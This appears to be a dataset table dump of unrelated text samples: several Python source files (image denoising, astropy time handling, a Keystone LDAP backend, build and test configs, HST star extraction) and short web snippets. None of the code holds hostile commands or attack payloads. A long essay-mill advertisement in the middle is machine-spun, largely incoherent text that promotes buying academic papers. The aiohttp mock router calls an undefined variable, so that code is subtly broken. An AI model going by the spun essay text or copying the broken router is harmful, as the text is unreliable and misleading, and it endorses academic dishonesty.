text
stringlengths 29
850k
|
|---|
"""Total variation denoising using PDHG.
This example solves the L1-HuberTV problem
min_{x >= 0} ||x - d||_1
+ lam * sum_i eta_gamma(||grad(x)_i||_2)
where ``grad`` is the spatial gradient and ``d`` is given noisy data. Here
``eta_gamma`` denotes the Huber function. For more details, see the Huber
documentation.
For further details and a description of the solution method used, see
https://odlgroup.github.io/odl/guide/pdhg_guide.html in the ODL documentation.
"""
import numpy as np
import odl
import matplotlib.pyplot as plt
# Define ground truth, space and noisy data
shape = [100, 100]
space = odl.uniform_discr([0, 0], shape, shape)
orig = odl.phantom.smooth_cuboid(space)
d = odl.phantom.salt_pepper_noise(orig, fraction=0.2)
# Define objective functional
op = odl.Gradient(space) # operator
norm_op = np.sqrt(8) + 1e-2 # norm with forward differences is well-known
lam = 2 # Regularization parameter
const = 0.5
f = const / lam * odl.solvers.L1Norm(space).translated(d) # data fit
g = const * odl.solvers.Huber(op.range, gamma=.01) # regularization
obj_fun = f + g * op # combined functional
mu_g = 1 / g.grad_lipschitz # Strong convexity of "f*"
# Define algorithm parameters
class CallbackStore(odl.solvers.Callback): # Callback to store function values
def __init__(self):
self.iteration_count = 0
self.iteration_counts = []
self.obj_function_values = []
def __call__(self, x):
self.iteration_count += 1
self.iteration_counts.append(self.iteration_count)
self.obj_function_values.append(obj_fun(x))
def reset(self):
self.iteration_count = 0
self.iteration_counts = []
self.obj_function_values = []
callback = odl.solvers.CallbackPrintIteration(step=10) & CallbackStore()
niter = 500 # Number of iterations
tau = 1.0 / norm_op # Step size for primal variable
sigma = 1.0 / norm_op # Step size for dual variable
# Run algorithm
x = space.zero()
callback(x) # store values for initialization
odl.solvers.pdhg(x, f, g, op, niter, tau, sigma, gamma_dual=mu_g,
callback=callback)
obj = callback.callbacks[1].obj_function_values
# %% Display results
# Show images
clim = [0, 1]
cmap = 'gray'
orig.show('Original', clim=clim, cmap=cmap)
d.show('Noisy', clim=clim, cmap=cmap)
x.show('Denoised', clim=clim, cmap=cmap)
# Show convergence rate
def rel_fun(x):
x = np.array(x)
return (x - min(x)) / (x[0] - min(x))
i = np.array(callback.callbacks[1].iteration_counts)
plt.figure()
plt.loglog(i, rel_fun(obj), label='PDHG')
plt.loglog(i[1:], 20. / i[1:] ** 2, ':', label='$O(1/k^2)$')
plt.title('Function Values')
plt.legend()
|
Idaho support as a point of reference to a divorce can be interpreted two different ways.
Idaho support or as it is commonly called spousal maintenance or alimony, can be either permanent or temporary.
Either way, there are several ways to diminish your Idaho support responsibility.
Alimony in Idaho can be set at the discretion of your county judge in Family court if you and your ex can’t reach an agreement.
Fundamentally the larger the disposable income disparity, the more you’ll pay. That means you want to do everything to reduce or even eliminate this variance.
Idaho Child Support is an unusual issue because unlike alimony, it’s not left to the discretion of a judge, but calculated using Idaho guideline formulas.
Many times parents reach arrangements with no court participation. If, on the other hand, you and your ex don’t agree on child support, a judge will determine your child support payment using the Idaho child support guidelines.
Whatever your Idaho Support fears are, child support or alimony, you must have a strategy to achieve the results you want.
|
#
#
# Copyright 2015 Marco Bartolini, bartolini@ira.inaf.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from decimal import Decimal
from astropy.time import TimeUnix, Time
import astropy._erfa as erfa
import time
CENTINANOSECONDS = 10000000
class TimeDiscos(TimeUnix):
"""
Acs Time: centinanoseconds from 1970-01-01 00:00:00 UTC
"""
name = 'discos'
unit = 1.0 / (erfa.DAYSEC * CENTINANOSECONDS)
def __init__(self, val1, val2, scale, precision,
in_subfmt, out_subfmt, from_jd=False):
super(TimeDiscos, self).__init__(val1, val2, scale, 7,
in_subfmt, out_subfmt, from_jd)
def parse_unix_time(unix_timestamp_string):
int_timestamp = int(Decimal(unix_timestamp_string) * CENTINANOSECONDS)
return Time(int_timestamp,
format = 'discos',
scale = 'utc',
precision = 7)
def get_acs_now():
return Time(time.time() * CENTINANOSECONDS, format="discos")
def unix_to_acs_time(unix_timestamp):
return Time(unix_timestamp * CENTINANOSECONDS, format="discos")
|
However, if you do not have the finances or time to repair the house, you can still sell it fast in “as is” state. That’s actually what we do here at Buying Houses Nashville. We buy Nashville houses… we pay cash… we can close quickly… and you won’t have to do any repairs at all.
Give us a call at (615) 905-0039 if you need to sell fast... we can make you a fair all-cash offer within 24 hours. No obligation or hassle at all. Take the offer, chew on it and decide if it’s right for you.
|
import ldap
import ldap.filter
import keystone.backends.backendutils as utils
from keystone.backends.api import BaseUserAPI
from keystone.backends.sqlalchemy.api.user import UserAPI as SQLUserAPI
from .. import models
from .base import BaseLdapAPI, add_redirects
class UserAPI(BaseLdapAPI, BaseUserAPI):
DEFAULT_TREE_DN = 'ou=Users,dc=example,dc=com'
DEFAULT_STRUCTURAL_CLASSES = ['keystoneUidObject']
DEFAULT_ID_ATTR = 'uid'
options_name = 'user'
object_class = 'keystoneUser'
model = models.User
attribute_mapping = {
'password': 'userPassword',
'email': 'mail',
'enabled': 'keystoneEnabled',
}
attribute_ignore = ['tenant_id']
def _ldap_res_to_model(self, res):
obj = super(UserAPI, self)._ldap_res_to_model(res)
tenants = self.api.tenant.get_user_tenants(obj.id, False)
if len(tenants) > 0:
obj.tenant_id = tenants[0].id
return obj
def get_by_name(self, name, filter=None):
return self.get(name, filter)
def create(self, values):
# Persist the 'name' as the UID
values['id'] = values['name']
delattr(values, 'name')
utils.set_hashed_password(values)
values = super(UserAPI, self).create(values)
if values['tenant_id'] is not None:
self.api.tenant.add_user(values['tenant_id'], values['id'])
return values
def update(self, id, values):
old_obj = self.get(id)
try:
new_tenant = values['tenant_id']
except KeyError:
pass
else:
if old_obj.tenant_id != new_tenant:
if old_obj.tenant_id:
self.api.tenant.remove_user(old_obj.tenant_id, id)
if new_tenant:
self.api.tenant.add_user(new_tenant, id)
utils.set_hashed_password(values)
super(UserAPI, self).update(id, values, old_obj)
def delete(self, id):
super(UserAPI, self).delete(id)
for ref in self.api.role.ref_get_all_global_roles(id):
self.api.role.ref_delete(ref.id)
for ref in self.api.role.ref_get_all_tenant_roles(id):
self.api.role.ref_delete(ref.id)
def get_by_email(self, email):
users = self.get_all('(mail=%s)' % \
(ldap.filter.escape_filter_chars(email),))
try:
return users[0]
except IndexError:
return None
def user_roles_by_tenant(self, user_id, tenant_id):
return self.api.role.ref_get_all_tenant_roles(user_id, tenant_id)
def get_by_tenant(self, id, tenant_id):
user_dn = self._id_to_dn(id)
user = self.get(id)
tenant = self.api.tenant._ldap_get(tenant_id,
'(member=%s)' % (user_dn,))
if tenant is not None:
return user
else:
if self.api.role.ref_get_all_tenant_roles(id, tenant_id):
return user
return None
def delete_tenant_user(self, id, tenant_id):
self.api.tenant.remove_user(tenant_id, id)
self.delete(id)
def user_role_add(self, values):
return self.api.role.add_user(values.role_id, values.user_id,
values.tenant_id)
def user_get_update(self, id):
return self.get(id)
def users_get_page(self, marker, limit):
return self.get_page(marker, limit)
def users_get_page_markers(self, marker, limit):
return self.get_page_markers(marker, limit)
def users_get_by_tenant_get_page(self, tenant_id, marker, limit):
return self._get_page(marker, limit,
self.api.tenant.get_users(tenant_id))
def users_get_by_tenant_get_page_markers(self, tenant_id, marker, limit):
return self._get_page_markers(marker, limit,
self.api.tenant.get_users(tenant_id))
def check_password(self, user, password):
return utils.check_password(password, user.password)
add_redirects(locals(), SQLUserAPI, ['get_by_group', 'tenant_group',
'tenant_group_delete', 'user_groups_get_all',
'users_tenant_group_get_page', 'users_tenant_group_get_page_markers'])
|
Eleven SEC teams played in bowls following the 2018 regular season. Alabama, of course, still has one bowl to go. Look inside for highlights from all the SEC bowls that have been played so far.
Florida meets Michigan on Saturday at the Peach Bowl in Atlanta. Here is a first look at the Gators-Wolverines matchup.
South Carolina meets Virginia on Saturday at the Belk Bowl in Charlotte. Here is a first look at the Gamecocks-Cavaliers matchup.
Oklahoma meets Alabama on Saturday at the Orange Bowl (CFP Semifinal) in Miami, Fla. Here is a first look at the Sooners-Crimson Tide matchup.
|
#!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Verify that a that a tool module in site_tools overrides base tool.
Use 'm4' as test tool since it's likely to be found,
and not commonly overridden by platform-specific stuff the way cc is.
"""
import TestSCons
test = TestSCons.TestSCons()
test.subdir('site_scons', ['site_scons', 'site_tools'])
test.write(['site_scons', 'site_tools', 'm4.py'], """
import SCons.Tool
def generate(env):
env['M4']='my_m4'
env['M4_MINE']=1
def exists(env):
return 1
""")
test.write('SConstruct', """
e=Environment()
print e.subst('M4 is $M4, M4_MINE is $M4_MINE')
""")
test.run(arguments = '-Q .',
stdout = """M4 is my_m4, M4_MINE is 1
scons: `.' is up to date.\n""")
test.pass_test()
# end of file
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
Put your Facebook performance into context and find out who's strategy is working best. Just add your page and get a free social media report that compares you to Aktive Gebäudereinigung. Download the sample report or learn more about our Facebook benchmarking tool.
|
# Copyright 2015 by Benjamen R. Meyer
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from aiohttp_mock.exceptions import *
from aiohttp.client_reqrep import ClientResponse
from aiohttp_mock.utils import cidict
class ConnectionRouterHandler(object):
"""Handler for a given URI
This class handles all the HTTP Verbs for a given URI.
"""
def __init__(self, uri):
self.uri = uri
self._method_handlers = {}
def add_method_handler(self, method, handler):
"""Add or update the Method handler
:param method: string - HTTP Verb
:param handler: ClientResponse object or callable
that will be used to respond to
the request
"""
self._method_handlers[method] = handler
def handle(self, method, request):
"""Handle a request
:param method: string - HTTP Verb
:param request: aiohttp.client_reqrep.ClientRequest
:returns: aiohttp.client_reqrep.ClientResponse
Note: Returns an HTTP 405 if the HTTP Verb is not
supported
"""
# If the method has a registered handler, then
# return it. Otherwise, create a 405 response
if method in self._method_handlers:
handler = self._method_handlers[method]
# Callbacks must be callables
if hasattr(handler, '__call__'):
return self._method_handlers[method](_request)
else:
return handler
else:
response = ClientResponse(method, self.uri, host='aiohttp_mock')
response.status = 405
response.reason = 'Method Not Supported'
response._should_close = False
response._headers = cidict({
'x-agent': 'aiohttp-mock',
'content-length': 0
})
return response
class ConnectionRouter(object):
def __init__(self):
self._routes = {}
def reset(self):
"""Reset all the routes
"""
self._routes = {}
def add_route(self, uri):
"""Add a route to be managed
:param uri: string - URI to be handled
"""
if uri not in self._routes:
self._routes[uri] = ConnectionRouterHandler(uri)
def get_route(self, uri):
"""Access the handler for a URI
:param uri: string - URI of the request
:returns: ConnectionRouterHandler instance managing the route
:raises: RouteNotHandled if the route is not handled
"""
if uri in self._routes:
return self._routes[uri]
else:
raise RouteNotHandled('{0} not handled'.format(uri))
def add_route_handler(self, uri, method, handler):
"""Add an HTTP Verb handler to the URI
:param uri: string - URI that the handler is for
:param method: string - HTTP Verb the handler is for
:param handle: ClientResponse or callable that will handle the request
"""
try:
router = self.get_route(uri)
except RouteNotHandled:
self.add_route(uri)
router = self.get_route(uri)
router.add_method_handler(method, handler)
def handle(self, method, uri, request):
"""Handle a request and create a response
:param method: string - HTTP Method the request is calling
:param uri: string - URI the request is for
:param request: aiohttp.client_reqreq.ClientRequest instance
for the request
:returns: aiohttp.client_reqrep.ClientResponse instance
:raises: RouteNotHandled if the route is not handled
"""
router = self.get_route(uri)
return router.handle(method, request)
|
Buy Katty Sneakers Navy Casual Shoes online at best prices in India. Shop online for Katty Sneakers Navy Casual Shoes only on Papapaise.com. Get Free Shipping & CoD options across India.
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os
import nox
@nox.session
@nox.parametrize('python_version', ['2.7', '3.4', '3.5', '3.6'])
def unit_tests(session, python_version):
"""Run the unit test suite."""
# Run unit tests against all supported versions of Python.
session.interpreter = 'python{}'.format(python_version)
# Set the virtualenv dirname.
session.virtualenv_dirname = 'unit-' + python_version
# Install all test dependencies, then install this package in-place.
session.install(
'mock',
'pytest',
'pytest-cov',
'grpcio >= 1.0.2',
)
session.install('-e', '.')
# Run py.test against the unit tests.
session.run(
'py.test',
'--quiet',
'--cov=google.cloud',
'--cov=google.api.core',
'--cov=tests.unit',
'--cov-append',
'--cov-config=.coveragerc',
'--cov-report=',
'--cov-fail-under=97',
os.path.join('tests', 'unit'),
*session.posargs
)
@nox.session
def lint(session):
"""Run linters.
Returns a failure if the linters find linting errors or sufficiently
serious code quality issues.
"""
session.interpreter = 'python3.6'
session.install(
'flake8', 'flake8-import-order', 'pylint', 'gcp-devrel-py-tools')
session.install('.')
session.run('flake8', 'google', 'tests')
session.run(
'gcp-devrel-py-tools', 'run-pylint',
'--config', 'pylint.config.py',
'--library-filesets', 'google',
'--test-filesets', 'tests',
# Temporarily allow this to fail.
success_codes=range(0, 100))
@nox.session
def lint_setup_py(session):
"""Verify that setup.py is valid (including RST check)."""
session.interpreter = 'python3.6'
# Set the virtualenv dirname.
session.virtualenv_dirname = 'setup'
session.install('docutils', 'Pygments')
session.run(
'python', 'setup.py', 'check', '--restructuredtext', '--strict')
@nox.session
def cover(session):
"""Run the final coverage report.
This outputs the coverage report aggregating coverage from the unit
test runs (not system test runs), and then erases coverage data.
"""
session.interpreter = 'python3.6'
session.install('coverage', 'pytest-cov')
session.run('coverage', 'report', '--show-missing', '--fail-under=100')
session.run('coverage', 'erase')
|
You need to simply outsource your online marketing must appropriate consultants! Convincing investors to provide the money you will need to improve your supplier preferences award-winning company strategy posting attributes. The creating write essay for money business allows via the internet positions to free-lance freelance writers exactly like you.
You will find indeed this well known group that gives good environment service might be the response to plenty of complications that commercial entities and private people today are experiencing the right now. One of the primary factors that not so big to moderate establishments rarely go to gain all of their opportunities is that they don’t have got the applicable equipment into place to permit the attribute of work to remain frequent spanning every area. Hence, if wishing to acquire an income from authoring, signing up through having an web-based essay publishing business enterprise is often an great way to put together some https://www.aims.edu/student/online-writing-lab/understanding-writing/evaluation.php further hard earned money.
Since it is believed to be a central portion of advising, it needs to be tutored during the standard variety of therapy consequently the advisors include ethnic competence to know-how achieved simply because they upfront in instructing. If you would like an academic publishing enhancing strategies, you ought to flip your interest to the online site and create a near consider it sooner or later spending money on assistance! So that you can substantiate a disagreement, the pupil is needed to bring ideas from a range of supplementary providers like on the internet collection, brick and mortar publications and event scientific studies, they will may not be naturally accessibility to.
It’s for that reason imperative for a student who isn’t sure or might not exactly get view on policies of AMA citation style and design, to obtain the expertise of the skilled publishing facilities connected with a respectable organization. The licensed tailored examine pieces of paper https://essaycastle.co.uk/ posting people are some of the least complicated choices to have lots of the profits when it is a challenge on your degree and work without any risk attached. At, every customized essay creating customer service you’ll get hold of e-commerce it is the right time to locate the specialist that will guide you boost the school.
Just in case you be afraid of the standard of documents you usually have the option to measure those of you that produce feed back from multiple purchasers that will be very good that we all aren’t unfaithful you and also if they’re for sure the least expensive qualified professional authoring system. To purchase the investigation old fashioned paper with the help of online activity the buyer will need to practical knowledge some carry out. Rank websites price range our services are devoted to the evaluation of all the give essay making manufacturers.
Everybody is working to end their everyday activities. Good, there’s only one effective method of getting what you would like. Its lways time and effort punctually.
Acquire our trained and thoroughly legitimate assist and get each and every paperwork successfully done super fast! Check Volume Most essay authoring businesses pay out several circumstances each month on the standard meeting. Consult with us at this time in the most effective academic documents around the world.
At a vocational magnitude, you can easlily acquire a degree or qualification of conclusion to ensure your understanding of nice internet business practices. There may not be a build declaring the basic truth an essay is an obligatory area of the school course load of the university student. If for style projects or contained in the higher education program course of action, selecting the fix essay subject areas is essential for use on your levels or variety.
Also, it may be proceeding to help you ensure within the author’s knowledge and get an wise assistance with any area you discover tricky. Should you compose this kind of paper you are essentially preparing your opinions and increasing your looking for methods. To ensure you don’t have almost anything to be anxious about as they have most of the key knowledge to prepare the top investigating newspaper.
To give an example, research shows that in states, there was an amazing shift in multicultural advising when the 1960s Civil Protection under the law circulation and perception and issue of this minority significantly changed within nation. There are a variety of great things about getting to be national qualified advisors. There are several competent organizations with professional essay penning clubs staying recruited by individuals principally learners with your purpose of essay authoring consequently the school students along with the common women and men are prepared to receive some attributes from that.
Becoming familiar with to whom you’re publishing will give you support in enjoying a rhetorical stance. Regretfully, authors lately are simply stealing using their company gorgeous writers! Essay also signifies the conditions in connection with the growth and development of mind.
A normal thesaurus can help you in this case. Applying entirely wrong verb make can adjust the importance of a phrase fully. Oxford coming up with style is one of the most simple and easily comprehensible crafting versions.
Twinning is undoubtedly an exceptional way of getting an international levels, specially in times of economic slowdown, but there are actually caveats that you must be alert to. Also, you are required to reveal your own private id in the very best sunshine. Initially, you need to really know what a concept is, and secondly, you have to know in doing what way the methods are correlated.
Exploration written documents are supposed to measure and study the comprehension of men and women a number of chosen subject areas. Article writing a thesis declaration requests outstanding cleverness off the look for the essay copy writer because it requires to spell out the essential understanding of the innovative. Essay simply writing expectations adequate perception of the primary method of getting the niche that you truly wants to jot down on.
Later on it is possible to compile a listing of all the means that you just simply necessarily mean to use within your lookup report. If you decide to don’t take advantage of the found document, we’ll revise it. The first strategy for article writing a really good educational cardstock shall be to comprehend the subject also to keep to the information made available to guide you through the task.
Develop your descriptive essay so quite interesting for which you individuals will really look they view the similar matter you could be explaining. Ensure the target audience obtain a intellectual photo of the topic of your descriptive essay. Our accredited essay freelance writers can offer standard post critique articles that should allow you to get levels that is more beneficial.
Governmental discipline is usually an vast subject matter that takes under consideration plentiful ideas. Sadly, authors in recent times are simply stealing off their excellent creators! Our creators are sensible this regularly options they are often be effective at offer on virtually every teaching that you’ve had lined.
The average thesaurus can help you these. Utilizing erroneous verb create can modify the necessity of a phrase altogether. To cope with this section safely and effectively, you need to be appropriately-look at along with informed about varied writing articles varieties.
Distributing articles and other content online is a terrific method of make your endeavor venture for a large amount of issues. Perform Gross sales Setting up a strong reputation along with a lot of testimonials puts you within a ideally suited destination for a uncover recurring purchases within your existing client base. The internet has enormous possibilities and much to grant with regard to assistance.
In addition to inside promotes, shopping on-line provides accessibility to overseas things. One of the main points why that reasonable to method enterprises rarely ever reach attain their whole opportunity is because they don’t hold the relevant devices set to permit the feature of work that should be absolutely consistent all around every area. That is why, if interested to gain money from producing, signing up that have an on-line essay penning corporation is surely an exceptional solution to prepare some other some money.
On line formulating classes are a invaluable implies that to offer the teaching you will need. On-line guidance in this portion foliage a multitude of selections for possible individuals to join. They can join this course to take advantage of the lots of benefits it gives you.
Within the vocational degree, it is easy to obtain a degree or certificates of conclusion to ensure your understanding of amazing venture strategies. Once you signify the deadline and all of your requirements, you desire to discuss the acquisition. Whether or not for quality duties or included in the school job application course of action, deciding on the ideal essay ideas is really important to the grades or variety.
Likewise, at the same time, it assists you to around the educational leading. Some people may imagine that showering their companion with a floral arrangement and costly gift ideas is the best system of proclaim their would like to them. The very best challenge about everything is you do not have to work out your money.
It is very important for any superior LPN to grasp firstly the essential classes that you need to be in a position to get through within a particular environment. Within this perspective, you may verify any method deliver the results from historic past or placed time frame. Even it’s possible to carry on with look at on smart dataphone even while going.
Just make sure you confirm these data to come up with your research reputable. These reviews are recommended for a number of requirements. Consequently, it is best to be sure that you collaborate with accurate leaders which may be published.
It is possible to surf located on the site’s attainable requests in the you can find sales portion, go for your shop for, and begin article writing. Basic information should not be obtained during the night. On-time transporting provide You will definitely get your quest report before you’re the required occasion.
In the event you pause within common for the papers you generally have the option to confirm for those that provide testimonials from several valued clients to remain constructive that most of us aren’t cheating you and if they’re for sure the most affordable expert publishing product. To accumulate the investigation paper with the help of online process the customer should past experiences some practice. All our service are bona fide since we’ve qualified and dependable writers from all sorts of scholastic destinations.
Whenever you aren’t sure of any thing in between your posting or searching for you will need to take part by a professor or peer. Periodically formidable confidence plays a role in intellectual illnesses as paranoia or irritation or some other and it’s an immensely difficult duty that may help these sort of men and women to come back to reality. So the generating attributes simply have to be great a sufficient amount of to get a pre-university or college program.
To give an example, analysis proves that in north america, there is a superb shift in multicultural therapy after the 1960s Civil Legal rights mobility and insight and health problem of this minority seriously transformed within country. Varying points lead youngsters from around the world in our web page. You will need to consider that there are going to be other folks that is going to be communicating when you finally.
When particular a selection to decide, you have got to refer to typically from many types of knowledge options as a way to consider the most researchable and pertinent matter for formulating an essay. Numerous MBA pupils anxiety whenever a report or essay a part of the course load. It is crucial for men and women crafting essays to check out wonderfully on the subject of the topic of the essay since it is the topic of the essay that could provide them with the practical finding out within the human body they will likely compose inside the essay.
This given that now you can accept PhD thesis article writing guidance that’s proposed by pros. Distinct from some company blueprints, make sure that you pick up your essays, there’s the real scholastic. Our industry is demanding in educational crafting and that’s the explanation of why we now have skilled our freelance writers so they can develop and supply you with initial descriptive essay writings.
Generating solid reports isn’t uncomplicated. Be sure the visitors receive a cognitive imagine of the main topic of your descriptive essay. Our freelance writers contain a considerable insights in composing various kinds of review reports on 50 plus information.
Acceptable, I Believe I Realize Scholastic Essay Writing Organizations, Now Say About School Essay Writing Vendors!
Some organizations don’t accomplish that just because an academic document tend to be completed by means of a editor who’s not really qualified upon section. The only real actually means to absolutely satisfy your long-term financial goals and objectives is via progress together with single tactic to lift up your internet business correctly will be finding the suitable policy and operations handbooks constantly in place. You need to make your pitches to deeply-pocketed brokers sometimes.
On top of internal markets, shopping on the web delivers convenience to world-wide items. The costs in our very best essay authoring service aren’t the top and not the smallest for the market place. As a result, if interested to gain an income from publishing, signing up which has an on-line essay creating corporation is definitely an impressive way to set up some alternative earnings.
Apart from primary motive of any kind of essay simply writing will most likely be to active one’s have observe or feelings besides the results of our research that any male or female may have made related to any problem or happening and so forth … Some sentence structure checkers are pricy, specially those that demonstrate useful end results. If you’re most likely to search for the dying essay beginning helpful hints over the web you are likely to undoubtedly locate many them but if you would like some far superior starters then it’s easy to have a look at subsequent interest grabber ways to start off your dying essay.
Some of the most delightful areas of acquiring over the web publishing curriculums certainly is the basic fact you can possibly opt for and pick the exact information you want to be taught leaving the others by itself. Most job hopefuls experience for their the lack of familiarity with net reading. Make sure that the creator of a software program is allowed to train.
Therefore you buckle up, drink the remainder on the electricity take and begin carrying out work just as before. It needs to be in some manner innovative to help lure the desire from your readers and attempt to produce the photo out properly. Even so, a large amount of them crash.
Jointly with your inferior writing skillsets, it should in a similar fashion be stressful for one to live inside your licensed vocation. Every so often solid firm belief plays a part in cerebral symptoms as paranoia or annoyance or other and it’s a somewhat challenging occupation in order to these types of citizens to come back to certainty. Planning to prepare a cardstock when you’ve gained no second, no love and utterly zero drive some of us discover how horrible it can be.
The way forward for world-wide financial state is at the disposal of people which happen to be taking advantage of the very best native or worldwide education and learning potentials. A superb comprehension of such a dilemma and comprehension of an historic and national have an impact on is vital to produce the subject a fresh program. There are many certified organisations with consultant essay publishing squads increasingly being recruited by people notably learners together with the intention of essay crafting so that the learners in addition to popular men and women are prepared to acquire some features as a result.
Seriously critical managing papers are to some extent very expensive but still moderately priced in comparison to the people who aren’t pressing and involve a day or two to end. A University or college Coursework Writer should really be loaded with the most suitable experience and knowledge to behavior top-quality examine. Our essay making application employs the existing composing software to enable certain articles which can be made available to customers are of top quality.
It’s as a result crucial to acquire a learner who isn’t assured or might not exactly possess any strategy on laws of AMA citation manner, to get the services of the veteran publishing service providers associated with a reliable solid. If you’re widely used of beliefs records, our by going online producing network is the ideal spot to create your pay for. Please read on to learn a little more very good reasons why you must have faith in our expert services.
If you should pause within the traditional within the paperwork you always have the choice to be sure of for folks who furnish opinions from a range of valued clients to get excellent we aren’t being unfaithful you together with if they’re in actual fact the most cost effective commercial making specialist. Therefore, it’s noticeable this to pinpoint a trustworthy dealer, you must look at the consumer reviews of the very commonly used school newspaper organizations. Online service providers are slightly even more responsible and easily affordable at the same time.
Brothers Calligraphy is focused on offering the greatest practical work for their clientele. Davidson Teaching is 1 reputable company that provides positive examination prep sessions in to the altogether people. They will often sign up for this program to leverage the benefits it offers.
With the vocational diploma, you may secure and safe a diploma or degree or certification of completion to ensure your understanding of superb business enterprise measures. Specifying the problem really shines the beginning. Regardless if for school responsibilities or contained in the higher education applying process, deciding on the perfect essay concepts is really important for the grades or choice.
Commuter trainees get the capability to modify the monotony of high school. You could possibly get involved in many types of quiz prize draws and acquire splendid prizes. You need to have heard that there are many scholarship grants fellowships which were very easy to incorporate and obtain.
Our essay authors have nicer material critique penning competencies which they’ve been educated therefore they will certainly supply you with records which can be actual. The best way to the ideal essay is via WritePaperFor.Me. The essays are performed in order to solution to some dilemma.
When authoring an essay, it’s vital to observe the creating style and design as there are different forms of design which they can use on the challenge. One particular premier inquiries and need to factor to write a technique essay coming up with helpful tips a person to prepare a substantial amount of authoring website. The remaining condition, that you just ought to think about upon settling on the simplest school essay simply writing internet page, is the way it requires to use only top quality writers.
University students invariably secure and protected mad as they don’t purchase incredible grades for writing courage essays for most of them is convinced this is actually a most basic topic that is known yet the a few the straightforward fact is these are generally inappropriate, you can’t create a valor essay if you happen to don’t have a very appropriate expertise in a persons psyche. Coming up with of content critique isn’t among the main duties you are most likely contemplating. Opting For Matters If you’re assigned essay articles you need to read additional info on the subject and choose regardless of whether you simply must offer an on the whole Introduction or tackle a certain niche market with a large subject matter.
|
import numpy as np
from astropy.table import vstack
from photutils import DAOStarFinder
from astropy.nddata import NDData
from photutils.psf import extract_stars
from astropy.io import fits
from astropy.table import Table
datadir = '/melkor/d1/guenther/downdata/HST/CepMASTfull/'
# I blinked through the images in ds9 to find single, isolated well-exposed
# stars not too far from the center but outside of the Cepheid PSF and not on
# any of the diffraction spikes.
prflist = [
['ibg405010_drz.fits', 340, 38],
['ibg416010_drz.fits', 443, 215],
['ibg418010_drz.fits', 112, 945],
['ibg418010_drz.fits', 112, 945],
['ibg422010_drz.fits', 895, 319],
['ibg426010_drz.fits', 385, 93],
['ibg436010_drz.fits', 342, 877],
['ibg438010_drz.fits', 416, 401],
['ibg440010_drz.fits', 211, 337],
['ibg443010_drz.fits', 359, 288],
['ibg444010_drz.fits', 328, 345],
['ibg444010_drz.fits', 725, 723],
['ibg446010_drz.fits', 276, 500],
['ibg453010_drz.fits', 812, 845],
['ibg453010_drz.fits', 333, 188],
['ibg455010_drz.fits', 263, 444],
['ibg456010_drz.fits', 529, 696],
['ibg458010_drz.fits', 161, 806],
['ibg459010_drz.fits', 374, 166],
['ibg465010_drz.fits', 588, 723],
['ibg468010_drz.fits', 150, 508],
['ibg471010_drz.fits', 600, 685],
['ibg471010_drz.fits', 892, 511],
]
#prflist = [['ibg402010_drz.fits', 612, 209],
# ['ibg402010_drz.fits', 1007, 951],
# ['ibg402010_drz.fits', 488, 705], # GAIA bad
# ['ibg403010_drz.fits', 597, 385],
# ['ibg405010_drz.fits', 570, 701], # GAIA bad
# ['ibg455010_drz.fits', 263, 444],
# ['ibg456010_drz.fits', 530, 696],
# ['ibg456010_drz.fits', 549, 462], # GAIA bad
# ['ibg456010_drz.fits', 860, 408],
# ['ibg456010_drz.fits', 911, 115],
# ['ibg465010_drz.fits', 588, 723],
# ['ibg471010_drz.fits', 600, 685],
# ['ibg471010_drz.fits', 892, 511],
#]
# -1 because the above positions are measured in ds9, which counts from (1,1)
# while the python code counts from (0,0)
stars621 = extract_stars([NDData(fits.open(datadir + row[0])[1].data) for row in prflist],
[Table({'x': [row[1] - 1], 'y': [row[2] - 1]}) for row in prflist],
size=25)
stars845 = extract_stars([NDData(fits.open(datadir + row[0].replace('10_', '20_'))[1].data) for row in prflist],
[Table({'x': [row[1] - 1], 'y': [row[2] - 1]}) for row in prflist],
size=25)
def check_matching_source_exists(l1, l2, d,
xname='xcentroid', yname='ycentroid'):
'''Check for each source in l1, if one or more sources in l2 are close
This is not the most efficient way to do things, but very quick to code and
runtime is not a concern for this.
Parameters
----------
l1, l2: two source lists
d : float
maximal distance in pix, `None` means that all input sources are returned
Returns
-------
ind1 : array
Array of indices for l1. All elements listed in this index have at least one
